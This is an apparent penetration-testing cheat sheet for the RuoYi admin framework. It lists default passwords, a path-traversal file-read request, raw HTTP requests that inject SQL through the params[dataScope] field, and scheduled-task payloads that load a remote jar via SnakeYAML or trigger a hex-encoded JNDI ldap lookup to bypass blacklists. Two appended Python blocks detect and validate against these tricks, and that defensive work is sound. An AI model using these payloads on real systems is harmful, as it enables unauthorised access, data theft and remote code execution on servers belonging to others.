1. RuoYi default credentials
admin/admin123
ruoyi/123456
2. Front-end Shiro deserialization
The version is too old, so this is basically not exploitable; using a deserialization tool for it is not covered further here.
3. Arbitrary file read, RuoYi < 4.5.1
GET /common/download/resource?resource=/profile/../../../../../../../(unknown)
4. SQL injection
4-1. /system/role/list path
POST form
POST /system/role/list HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 181
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/system/role
Cookie: UMK8_2132_ulastactivity=fdf6lh5P4KaIR7rPwncVmGmx5z2ymLLNz3o33msgkFJlQ1SdH%2FhR; UMK8_2132_lastcheckfeed=1%7C1637287051; UMK8_2132_nofavfid=1; JSESSIONID=d9eca4a4-7fcd-41ba-9888-75e7c73dc9bf
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=&params[beginTime]=&params[endTime]=&params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))
GET form
GET /system/role/list?pageSize=10&pageNum=1&orderByColumn=&isAsc=&roleName=&roleKey=&status=&params%5BbeginTime%5D=&params%5BendTime%5D=&params%5BdataScope%5D=and+extractvalue(1,concat(0x7e,(select+database()),0x7e)) HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 181
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/system/role
Cookie: UMK8_2132_ulastactivity=fdf6lh5P4KaIR7rPwncVmGmx5z2ymLLNz3o33msgkFJlQ1SdH%2FhR; UMK8_2132_lastcheckfeed=1%7C1637287051; UMK8_2132_nofavfid=1; JSESSIONID=d9eca4a4-7fcd-41ba-9888-75e7c73dc9bf
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
4-2. /system/dept/list path
POST /system/dept/list HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.9
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Upgrade-Insecure-Requests: 1
sec-ch-ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"
Connection: keep-alive
Sec-Fetch-Dest: document
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Cookie:
sec-ch-ua-mobile: ?0
Sec-Fetch-User: ?1
sec-ch-ua-platform: "Windows"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Content-Length: 0
params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))
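As an added defensive example (not part of the original notes and not RuoYi's own code), the following Python parses raw requests like the two above, flags a client-supplied params[dataScope] (a key the server-side data-scope filter is supposed to populate itself, so a client never has a reason to send it) together with error-based injection functions in any parameter, and shows the mitigation of dropping that key before the query layer ever sees it. The sample requests, the key list and the pattern are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Keys the server's data-scope filter is supposed to populate itself; a client
# sending them is already suspicious (constructed list, mirrors the payload key above).
SERVER_CONTROLLED_KEYS = {"params[dataScope]", "params.dataScope"}

# MySQL error-based / time-based functions and keywords seen in the payloads above.
SQLI_PATTERN = re.compile(
    r"\b(extractvalue|updatexml|sleep|benchmark)\s*\(|\b(union|select)\b",
    re.IGNORECASE,
)


def parse_raw_request(raw: str) -> dict:
    """Split a raw HTTP request (as pasted from a proxy) into method, path and
    the merged query-string and form-body parameters."""
    raw = raw.replace("\r\n", "\n")
    head, _, body = raw.partition("\n\n")
    request_line = head.splitlines()[0]
    method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    params: dict = {}
    for source in (parts.query, body.strip()):
        for key, values in parse_qs(source, keep_blank_values=True).items():
            params.setdefault(key, []).extend(values)
    return {"method": method, "path": parts.path, "params": params}


def find_injection(raw: str) -> list:
    """Return (key, value, reason) findings for one raw request."""
    findings = []
    for key, values in parse_raw_request(raw)["params"].items():
        for value in values:
            reasons = []
            if key in SERVER_CONTROLLED_KEYS and value != "":
                reasons.append("client supplied a server-controlled key")
            if SQLI_PATTERN.search(value):
                reasons.append("SQL function or keyword in parameter value")
            if reasons:
                findings.append((key, value, "; ".join(reasons)))
    return findings


def sanitize_params(params: dict) -> dict:
    """Mitigation: drop server-controlled keys from client input so that only the
    data-scope filter can set them before the query is built."""
    return {k: v for k, v in params.items() if k not in SERVER_CONTROLLED_KEYS}


# Constructed sample requests modelled on the traffic above (not real captures).
BENIGN_POST = (
    "POST /system/role/list HTTP/1.1\n"
    "Host: 127.0.0.1\n"
    "Content-Type: application/x-www-form-urlencoded\n"
    "\n"
    "pageSize=10&pageNum=1&orderByColumn=&isAsc=&roleName=&roleKey=&status="
)
INJECTED_POST = (
    BENIGN_POST
    + "&params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))"
)
INJECTED_GET = (
    "GET /system/dept/list?deptName=&params%5BdataScope%5D="
    "and+extractvalue(1,concat(0x7e,(select+database()),0x7e)) HTTP/1.1\n"
    "Host: 127.0.0.1\n"
    "\n"
)

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_POST), ("post", INJECTED_POST), ("get", INJECTED_GET)):
        print(name, find_injection(sample))
    print(sanitize_params(parse_raw_request(INJECTED_POST)["params"]))
```

Because params[dataScope] is a server-controlled value, the check does not need a signature for every injection variant: the presence of the key in client input is sufficient to alert, and stripping it is the fix regardless of what the value contains.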
5. Scheduled tasks
5-1. Unrestricted scheduled-task invocation
After the exploit is staged on the VPS, create a new task on the scheduled-task page:
org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://vps地址/yaml-payload.jar"]]]]')
0/10 * * * * ?
5-2. Blacklist restricting the invocation string
The scheduled-task feature rejects the following:
Scheduled tasks block ldap remote calls
Scheduled tasks block http(s) remote calls
Scheduled tasks block rmi remote calls
org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["h't't'p'://vps地址/yaml-payload.jar"]]]]')
0/10 * * * * ?
5-3. Whitelist restriction on invoked classes
Use the genTableServiceImpl.createTable method to rewrite invoke_target to a JNDI payload.
Exploitation:
Create a new scheduled task:
genTableServiceImpl.createTable('UPDATE sys_job SET invoke_target = 'NILF' WHERE job_id = 1;')
0/10 * * * * ?
If the "invocation target string" of the task with job_id 1 is now NILF, the vulnerability exists and exploitation can proceed. The actual attack payload is:
genTableServiceImpl.createTable("UPDATE sys_job SET invoke_target = \"javax.naming.InitialContext.lookup('ldap://ip:埠/Deserialization/URLDNS/ekwzmxtyim.dgrh3.cn')\" WHERE job_id = 1;")
However, JNDI is usually disabled, so the value (javax.naming.InitialContext.lookup('ldap://ip:埠/Deserialization/URLDNS/ekwzmxtyim.dgrh3.cn')) is converted to hexadecimal to bypass the blacklist. The final payload is:
genTableServiceImpl.createTable('UPDATE sys_job SET invoke_target = 0x6a617661782e6e616d696e672e496e697469616c436f6e746578742e6c6f6f6b757028276c6461703a2f2f3139322e3136382e34342e38343a313338392f446573657269616c697a6174696f6e2f55524c444e532f656b777a6d787479696d2e64677268332e636e2729 WHERE job_id = 1;')
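As an added defensive example (not part of the original notes and not RuoYi's own code, whose allow and deny lists differ from the constructed ones here), this Python validator applies the checks a scheduled-task feature needs against the three tricks shown in 5-2 and 5-3: it normalises the invoke_target string by decoding hex literals and stripping quote characters before matching a deny list, it restricts callable beans and classes to an allow list so a database-helper bean such as genTableServiceImpl is not reachable, and it is meant to run both when a job is saved and again when it fires, so a value rewritten in sys_job afterwards is still caught. Host names in the samples are placeholders.

```python
import re

# Constructed allow lists for illustration only.
ALLOWED_BEANS = {"ryTask"}
ALLOWED_CLASS_PREFIXES = ("com.ruoyi.",)
# Tokens that must not appear once the obfuscations shown above are undone.
DENIED_SUBSTRINGS = (
    "ldap://", "rmi://", "http://", "https://",
    "javax.naming", "java.net.url", "javax.script", "org.yaml.snakeyaml",
    "sys_job", "invoke_target",
)
HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{2,})")
QUOTE_CHARS = re.compile(r"[\"'‘’“”`]")
# bean.method(args) or pkg.Class.method(args); the argument list is optional.
TARGET_FORM = re.compile(r"^([A-Za-z_][\w.]*)(?:\((.*)\))?\s*$", re.DOTALL)


def normalise(target: str) -> str:
    """Undo the obfuscations from this page before matching: decode MySQL-style
    hex literals (0x6a61...) to text, remove quote characters (h't't'p' -> http)
    and lower-case everything."""
    def decode_hex(m):
        try:
            return bytes.fromhex(m.group(1)).decode("utf-8", errors="replace")
        except ValueError:  # odd length: not a decodable literal, keep as is
            return m.group(0)
    text = HEX_LITERAL.sub(decode_hex, target)
    return QUOTE_CHARS.sub("", text).lower()


def validate_invoke_target(target: str) -> tuple:
    """Return (accepted, reason). Run on every create/update of a job's
    invoke_target and again right before the job executes."""
    stripped = target.strip()
    m = TARGET_FORM.match(stripped)
    if not m or "." not in m.group(1):
        return False, "not of the form bean.method(args) or pkg.Class.method(args)"
    owner = m.group(1).rsplit(".", 1)[0]
    if "." in owner:  # fully qualified class name
        if not owner.startswith(ALLOWED_CLASS_PREFIXES):
            return False, f"class {owner} is outside the allowed packages"
    elif owner not in ALLOWED_BEANS:
        return False, f"bean {owner} is not in the allow list"
    norm = normalise(stripped)
    for bad in DENIED_SUBSTRINGS:
        if bad in norm:
            return False, f"denied token {bad!r} present after normalisation"
    return True, "ok"


# Constructed samples with placeholder hosts (vps.invalid is not real infrastructure).
QUOTE_SPLIT = (
    "org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager "
    "[!!java.net.URLClassLoader [[!!java.net.URL "
    "[\"h't't'p'://vps.invalid/yaml-payload.jar\"]]]]')"
)
HEX_UPDATE = (
    "genTableServiceImpl.createTable('UPDATE sys_job SET invoke_target = 0x"
    + "javax.naming.InitialContext.lookup('ldap://vps.invalid:1389/x')".encode().hex()
    + " WHERE job_id = 1;')"
)

if __name__ == "__main__":
    for sample in ("ryTask.ryNoParams", "ryTask.ryParams('ry')", QUOTE_SPLIT, HEX_UPDATE):
        print(validate_invoke_target(sample))
```

Decoding hex literals before matching is what closes the 5-3 bypass; stripping quotes is what closes the 5-2 one. Checking the owner against an allow list rather than only the string against a deny list is what stops the indirect route through a helper bean, since the deny list can never enumerate every string that eventually reaches a JNDI lookup.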